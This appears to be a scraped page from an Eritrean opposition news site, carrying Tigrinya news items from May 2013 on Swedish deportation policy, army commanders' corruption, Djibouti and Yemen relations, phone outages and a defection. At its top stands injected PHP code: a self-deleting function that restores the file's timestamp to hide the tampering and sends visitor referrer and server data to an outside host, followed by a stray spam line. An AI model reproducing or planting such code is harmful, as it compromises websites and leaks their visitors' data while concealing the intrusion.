check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727708){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } ኣዛዝቲ ሰራዊት ብምስምሳት ሃብቲ ከኻዕብቱ ዝገብሩዎ ምጉያይ ይቕጽል ኣሎ
кремлевская диета

ኣዛዝቲ ሰራዊት ብምስምሳት ሃብቲ ከኻዕብቱ ዝገብሩዎ ምጉያይ ይቕጽል ኣሎ

User Rating: / 2
PoorBest 

 

 

 

 

11 ግንቦት 2013

ሽወደን  ንኤርትራውያን ስደተኛታት ክትሰጉግ

ሒዛቶ ንዝነበረት መደብ ደው ኣቢላቶ

ቲቲ ዝተባህለት ማዕኸን ዜና ሽወደን ከም ዝጸብጸቦ መንግስቲ ሽወደን ኣብታ ሃገር ንዝነበሩ ኤርትራውያን ስደተኛታት ብሓይሊ  ክሰጉግ ሒዝዎ ንዝነበረ መደብ ደው ክብል ጌሩሎ።

ነቲ ውሳነ ስዒቡ ፖሊስ ሃገር  ንኤርትራውያን ካብ ምስጓግ ክቑጠቡ ዝእዝዝ መምርሒ ተመሓላሊፉሎ።

ኣብ ቤት ጽሕፈት ሃገራዊ ምርመራ ክፍሊ ምክትታል ዶባት ሽወደን ዳይሬክተር ዝኾነ ሶረረን ክለርቶን ፖሊስ ሃገር ምስ ቦርድ ስደተኛታትን ንጉዳይ  ሰብኣዊ መሰል ዝጣበቕ ትካልን ተራኺቡ ኣብ ወድዓዊ ኩነታት ኤርትራ ዘተኮረ ዘተ ከም ዘካየደን እቶም ስደተኛታት ድማ ዋላ ሓደ ከይበደሉ ከም ገበነኛታት ዝቑጸሩ ኩነታት ምህላው ከም ዘረጋገጸን ገሊጹ።

ሽወደን ነዚ ውሳነ ዝወሰነት ኤርትራውያን ስደተኛታት ብሓይሊ ተሰጊጎም ኣብ ኢድ ስርዓት ኢሳይያስ እንተወዲቆም ክገጥሞም ንዝኽእል ሓደጋ ብምግንዛብዩ።

----------------------------------------///////////----------------------------------

11 ግንቦት 2013

ኣዛዝቲ ሰራዊት ብምስምሳት ሃብቲ ከኻዕብቱ ዝገብሩዎ ምጉያይ ይቕጽል ኣሎ

ምንጭታት ወጋሕታ ሳሊና  ካብ ውሽጢ ዝሰደዱልና ሓበሬታ ከምዘረጋገጾ ኣዘዝቲ ሰራዊት  ስግረ ዶብን ፍቓድ ሰራዊትን ኣሳቢቦም ገንዘብ  ዝምንዝዕሉ ተርእዮ ጸሓይ ዝወቅዖ ሓቂ ኮይኑ ይቕጽል ኣሎ።

ኣብ ክፍለ ሰራዊት 53  እቲ ተርእዮ ኩሉ ኣባል እታ ኣሃዱ ብግልጺ ዝዘራረበሉ ዓይኑ ዘፍጠጠ ጸገም ኮይኑ ከምዘሎ እቲ ሓበሬታ ብኣብነት ይገልጽ።

መራሒ ብራጌድ ደሳለኝን መራሒ ቦጦሎኒ ረዘነን ድማ እቶም ብስግረዶብን ፍቓድ ሰራዊትን ኣመሳሚሶም ሃብቲ ኣብ ምኽዕባት ዝጓየዩ ዘለው ኣዘዝቲ ከምዝኾነ ሓበሬታ ምንጭታት ወሲኹ ኣነጺሩ።

-------------------------------------///////////-----------------------------------

11 ግንቦት 2013

ምልካዊ ስርዓት ኢሳይያስ ሕጂውን ካብ ቶኽታኺ

ተግባራቱ ከም ዘይተቖጠበ ጅቡቲ ገሊጻ

ንፕረዚደንት ጅቡቲ እስማዔል ዑመር ገለ ብምጥቃስ መርበብ ሓበሬታ ኣዱሊስ ከም ዝጸብጸበቶ ስርዓት ኢሳይያስ ሕጂ’ውን ሉኡላዊ ክብሪ ጅቡቲ ካብ ምድፋር ኣይተቖጠበን

ኣብ መንጎ ክልቲአን ሃገራት ዘሎ ሓርፋፍ ርክብ ንምእላይ ንዝግበር ኩሉ ዓይነት ምትሕግጋዝ’ውን ነጺጉዎ ምህላው’ውን እቲ ፕረዚደንት ጠቒሱ’ሎ።

ስርዓት ኢሳይያስ ኣብ ዓመተ 2008 ኣብ ልዕሊ ጅቡቲ መጥቃዕቲ ብምፍጻም ልኡላዊ መሬት  ‘ታ ሃገር ድሕሪ ምውራሩ ኣብ መንጎ ክልቲአን ሃገራት ዝነበረ ዝምድና ከምዝሓርፈፈ ዝገለጸ ፕረዚደንት ዑመር ገለ ነቲ ጸገም ንምፍታሕ ብወገን ጅቡቲ ዝግበር ጻዕርታት ብስርዓት ህግደፍ ተቐባልነት ከይረኸበ ይቕጽል ምህላዉ ድማ ገሊጹ።

ብሰንኪ ኣብያ ስርዓት ህግደፍ ብቐሊሉ ክፍታሕ ዝነበሮ ዶባዊ ጉዳይ ናብ ውግእ ኣምሪሑ ካብ ዜጋታት ክልቲአን ሃገራት ብዙሕ ሂወት በሊዑ’ዩ ድማ ኢሉ

ጅቡቲ ምስ ኩለን ጎረባብታ ሃገራት ጽቡቕ ዝምድና ሃኒጻ ኣላ ዝበለ እቲ ፕረዚደንት ውልቀ መላኺ ኢሳይያስ ብዝኽተሎ ዘይቅርዑይ ምሕደራ ግና ርክብ ጅቡቲን ኤርትራን ዛሕቲሉ ምህላው ኣነጺሩ።

---------------------------------------/////////-------------------------------------

 

 

12ግንቦት  2013

ስርዓት ኢሳይያስ ምስ የመን ኣብ ዝወልዖ ረጽሚ ልዕሊ 150

ወተሃደራት ግዳያት ሓደጋ መቑሰልቲ ከምዝኾኑ ተረጋጊጹ

ምንጭታት ወጋሕታ ሳሊና ካብ ዓሰብ ዝሰደዱልና ሓበሬታ ከምዘረጋገጾ ስርዓት ኢሳይያስ ኣብ ደሴታት ሓንሽ ኣብ ዝወልዖ ረጽሚ ግዳያት ሓደጋ መቁሰልቲ ዝኾኑ ልዕሊ 150 ወተሃደራት ኣብ ዓሰብ ሕክምናዊ ረድኤት ይረክቡ’ለው።

ኣብቲ ረጽሚ ዝተማረኹ ብርክት ዝበሉ ኤርትራውያን ወተሃደራት ድማ “ዳጉሩ” ኣብ ትበሃል ኣብ ኢድ የመን ትርከብ ቦታ ከምዘለዉ እቲ ሓበሬታ የነጽር።

ስርዓት ኢሳይያስ ምግፋፍ ዓሳን ካልእ ምስምሳትን እንዳፈጠረ ብርክት ንዝበሉ የመናውያን ገፈፍቲ ዓሳ ክጨውይን ጀላብኦም መንዚዑ ክወርስን ዝጸንሐሉ ተርእዮ የመናውያን ንመንግስቶም ክሳብ መዓዝ ኢና እናተበደልና ትም ንብል ብምባል ዘማርሩሉ ኩነታት ኣኸሲቱ ጸኒሑ’ዩ።

ብፍላይ ኣብ ቀረባ ተመሳሳሊ ተግባር መጥቃዕትን መጭወይትን ምስጋጠመ መንግስቲ የመን ኤርትራ ካብዚ ጻሕታሪ ተግባራ እንተዘይተኣርኒባ ናይቲ ዝወርድ ጸገም ሓላፍነት ክትስከም’ያ ክብል ከምዘጠንቐቐ ዝዝከር’ዩ።

ስርዓት ኢሳይያስ ብኣማኢት ዝቑጸሩ ወተሃደራት ዜጋታት ኣደዳ ሞት መቁሰልትን ምሩኽን ካብ ዝኾነሉ ፍጻመ ከይተመሃረ ሕጂ’ውን ኣብ ልዕሊ የመን ሕነ ናይ ምፍዳይ ስጉምቲ ንምውሳድ ብዝብል ምስምስ ኣብ ባጽዕ ምትእኽኻብ ይገብር ከምዘሎ ካብቲ ከባቢ ዝመጸና ሓበሬታ ኣረጋጊጹልና’ሎ።

-------------------------------------/////////---------------------------------------

 

 

 

 

12ግንቦት  2013

ምቑራጽ ኣገልግሎት ቴሌፎን ንኩለንተና ጸገማት

ከተማ ኣቑርደት የጋድዶ ከምዘሎ ተፈሊጡ

ኣብታ ከተማ ዝርከቡ ምንጭታት ወጋሕታ ሳሊና ኣብ ዝሰደዱልና ሓበሬታ ዝብኣሰ ደረጃ ጽሬት ዘለዎ ኣገልግሎት ቴሌፎንን ሞባይልን እታ ከተማ ንማሕበረ ቁጠባዊ ንጥፈታት ኣቑርደት ተወሳኺ ዕንቅፋት ኮይኑ ጸገማት ህዝቢ ክተሓላለኽ ይገብር ኣሎ።

ቀዋሚ መስመር ቴሌፎን ከተማ ኣቑርደት ስሩዕ ግልጋሎት ክህብ ክጽገም ካብ ዝጅምር ዓመታት ዘቁጸረ’ኳ ተኾነ ተጠቀምቲ ዓማዊል ግብሪ እናኸፈሉ ኣገልግሎት ዝተሓረመሉ ኩነታት ይቕጽል ምህላዉ እቲ ሓበሬታ ጠቂሱ’ሎ።

ህዝቢ ብተደጋጋሚ መረረቱ ዝገልጽ’ኳ ተኾነ ስርዓት ኢሳይያስ ምላሽ ዝህበሉ ዓቕሚ ስለዝሰኣነ እቲ ጸገም ብኢሱዎ ይቕጽል ኣሎ።

ኣብ ተንቀሳቓሲ ቴሌፎን’ውን ተመሳሳሊ ጸገም ዘሎ ኮይኑ ገለ እዋን ክሳብ 2 ሰሙን ዝኣክል ጠቕሊሉ ዝቋረጸሉ ኣጋጣሚ ከምዘሎ ድማ ሓበሬታ ምንጭታትና ወሲኹ ኣረጋጊጹ።

-----------------------------------------////////////--------------------------------

13 ግንቦት  2013

ወዱ ንብርጋዴር ጀነራል ወዲ ቀይሕታይ ኣብኡ

ብዝገበረሉ ደገፍ ዶብ ሰጊሩ ኢትዮጵያ ኣትዩ።

ምንጭታት ወጋሕታ ሳሊና ካብ ከባቢ ባድመ ዝለኣኽዎ ሓበሬታ ከምዘረጋገጾ ወዲ ንብርጋዴር ጀነራል ወዲ ቀይሕታይ ዝኾነ ወዲ 19 ዓመት መንእሰይ ወላዲኡ ብዝገበረሉ ደገፍ ዶብ ሰጊሩ ኢትዮጵያ ኣትዩ’ሎ።

ድሕሪ ስርሒት ፎርቶ ኢሳይያስ ብሜጀር ጀነራል ሃይለ ሳሚኤል (ቻይና) ዝምራሕ እዚ ኣብ ዘለዎ ከባቢ ጋሽ ባርካ ንዝገብሮ ምብጻሕ እሙን ኮይኑ ሓለዋ ብምውህሃድ ዝተዋስኣ ብርጋዴል ጀነራል ወዲቀያሕታይ ሕጂ ግዜ የለን ኢሉ ንወዱ ከፋንው ምኽኣሉ ነገራት ኣብ ዘስክፍ ኩነታት በጺሑ ከምዘሎ ዝምስክር’ዩ ክብል እቲ ሓበሬታ ይገልጽ።

እዚ ብርጋዴር ጀነራል ወዲ ቀያሕታይ ዝወሰዶ ስጉምቲ መቐጸለታ ናይቲ ላዕለዎት ወተሃደራዊ ኣዘዝቲ ደቆምን ስድርኦም ናብ ደገ ከህድሙሉ ዝጸንሑ ተርእዮ ኮይኑ ዝጥቀስ’ዩ ድማይብል ሓበሬታ ምንጭታት ወጋሕታ ሳሊና።

-----------------------------------///////////---------------------------------------

 

 

 

 

 

 



Add comment

Your comments are as important as the article you are commenting on. Please enrich the discussion by avoiding personal attacks. We'll publish your comment, if it meets our criteria. تعليقاتك لا تقل اهمية عن المقال المكتوب اعلاه، فالرجاء اثراء النقاش بالابتعاد عن الاساءات الشخصية. سوف ننشر تعليقك اذا استوف شروط النشر



Security code
Refresh

Enough dictatorship

Get Adobe Flash player

Arkokabay Media -----> Poem

Get Adobe Flash player

مرض الرئيس الأريتري بين الشائعة والنفي

Get Adobe Flash player

ALIA GABRES- SHE COTTON SUMMER DRESSES

Get Adobe Flash player